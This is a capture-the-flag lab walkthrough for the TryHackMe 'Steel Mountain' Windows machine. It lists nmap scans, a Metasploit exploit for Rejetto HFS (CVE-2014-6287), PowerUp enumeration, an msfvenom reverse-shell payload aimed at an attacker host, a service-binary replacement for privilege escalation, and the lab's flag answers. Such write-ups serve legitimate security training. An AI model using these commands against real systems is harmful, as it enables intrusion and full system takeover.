TryHackMe: Steel Mountain

 

[Task 1] Introduction

1. Deploy the machine.Who is the employee of the month?

Let’s scan port

nmap -Pn <IP>

Scan services ans OS

nmap -sV -O <IP>

There’re 6 ports and services. OS is Windows Server 2008 R2 -2012

Let’s access port 80

http://<IP>

Inspect for resources, source code, and network. Now we have employee of the month.

ANS: Bill Harper

Let’s scan for exploit

nmap --script vuln <IP>

There are vulnerables :

port 80 -> http-vuln-cve2015–1635
port 8080 —> http-vuln-cve2011–3192

There are samba ports. Let’s scan with nmap

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <ip>

Nothing in the scan result.

[Task 2] Initial Access
1. Scan the machine with nmap. What is the other port running a web server on?
ANS: 8080

2. Take a look at the other web server. What file server is running?
Access website

http://<ip>:8080

Click at Server Information

It’s rejetto

ANS: Rejetto HTTP File Server

3. What is the CVE number to exploit this file server?

Access exploit-db.com

https://www.exploit-db.com/

search for rejetto, click first one

ANS: 2014–6287

4. Use Metasploit to get an initial shell. What is the user flag?

msfconsole

search 2014-6287

use 0

show options

set RHOSTS <target ip>

set RPORT 8080

run

getsystem 

migrate

It failed.

C:\Users\bill\Desktop

cat user.txt

ANS: b04763b6fcf51fcd7c13abc7db4fd365

[Task 3] Privilege Escalation

1. Upload Script

upload <path>

load powershell

powershell_shell

. .\Powerup.ps1

Invoke-Allchecks

2. Take close attention to the CanRestart option that is set to true. What is the name of the unquoted service path service name?

ANS: AdvancedSystemCareService9

3. The CanRestart option being true, allows us to restart a service on the system, the directory to the application is also write-able. This means we can replace the legitimate application with our malicious one, restart the service, which will run our infected program!

Let’s note the path first

C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe

Use msfvenom to generate a reverse shell as an Windows executable.

msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=<attacker port> -e x86/shikata_ga_nai -f exe -o ASCService.exe

Back to metasploit, create listening session

use multi/handler

set LHOST <attacker ip>

set LPORT <attacker port>

Back to my old session, in my case it’s #3

sessions 3

upload our exploit

upload /root/Desktop/ASCService.exe

Stop the service

shell

sc stop AdvancedSystemCareService9

Copy file

copy ASCService.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"

Start malicious service

sc start AdvancedSystemCareService9

Now, I only have 30 seconds to migrate to admin, if I waste my time session will die and I have to redo the steps again.

For me, I’ve done these steps about 5 times until I can get shell.

list process

ps

Migrate to lsass.exe, In my case it’s 648

migrate 648

getsystem

cd /Users/Administrator/Desktop

cat root.txt

ANS: 9af5f314f57607c00fd09803a587db80